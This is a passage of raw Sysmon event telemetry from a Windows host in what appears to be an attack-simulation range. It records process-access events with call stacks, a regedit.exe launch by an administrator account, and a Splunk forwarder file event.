12:09:53.907{266CAFBE-64C4-6064-9B00-00000000AE01}49243352C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\Windows.Storage.dll+16e55f|C:\Windows\System32\Windows.Storage.dll+16e1d5|C:\Windows\System32\Windows.Storage.dll+16dcc6|C:\Windows\System32\Windows.Storage.dll+16f138|C:\Windows\System32\Windows.Storage.dll+16daee|C:\Windows\System32\Windows.Storage.dll+fd005|C:\Windows\System32\Windows.Storage.dll+fd384|C:\Windows\System32\Windows.Storage.dll+fc9c0|C:\Windows\System32\Windows.Storage.dll+1663de|C:\Windows\System32\Windows.Storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\system32\windows.cortana.Desktop.dll+42239|C:\Windows\system32\windows.cortana.Desktop.dll+318b3|C:\Windows\system32\windows.cortana.Desktop.dll+320d4|C:\Windows\system32\windows.cortana.Desktop.dll+7e45|C:\Windows\system32\windows.cortana.Desktop.dll+81c6|C:\Windows\system32\windows.cortana.Desktop.dll+8209 154100x800000000000000011075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.914{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe10.0.14393.953 (rs1_release_inmarket.170303-1614)Registry EditorMicrosoft® Windows® Operating SystemMicrosoft CorporationREGEDIT.EXE"C:\Windows\regedit.exe" C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=BF5D30514FEA913E25CCC9E546257088,SHA256=254B18A8CC6589AF666EE17CE4E76C67350AECF578206CC7678745ED47A32D63,IMPHASH=E6DBB62DC548A099806914C678466448{266CAFBE-64C4-6064-9B00-00000000AE01}4924C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding 10341000x800000000000000011074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+2fc27|C:\Windows\system32\windows.cortana.Desktop.dll+2fb6b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+2fb01|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+2fc27|C:\Windows\system32\windows.cortana.Desktop.dll+2fb6b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+2fb01|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+2fc27|C:\Windows\system32\windows.cortana.Desktop.dll+2fb6b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+2fb01|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246424C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.onecore.dll+1717e|C:\Windows\system32\windows.cortana.onecore.dll+15f51|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\windows.cortana.onecore.dll+12bc0 10341000x800000000000000011067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 23542300x800000000000000011065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.688{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67F0B96B9321227642D6FA5208CBB49C,SHA256=314AB49569AAA67FE9A6A6579181769DCAFD44A156C308B455E0CB9EDBD39C20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.626{266CAFBE-646C-6064-1000-00000000AE01}11242204C:\Windows\system32\svchost.exe{266CAFBE-6691-6064-7501-00000000AE01}4004C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.626{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6691-6064-7501-00000000AE01}4004C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.610{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6691-6064-7501-00000000AE01}4004C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.610{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6691-6064-7501-00000000AE01}4004C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.610{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6691-6064-7501-00000000AE01}4004C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.610{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6691-6064-7501-00000000AE01}4004C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.610{266CAFBE-64C4-6064-9B00-00000000AE01}49246424C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.onecore.dll+1602f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.610{266CAFBE-64C4-6064-9B00-00000000AE01}49246424C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.onecore.dll+1717e|C:\Windows\system32\windows.cortana.onecore.dll+15fb7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000011056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.610{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.610{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.595{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 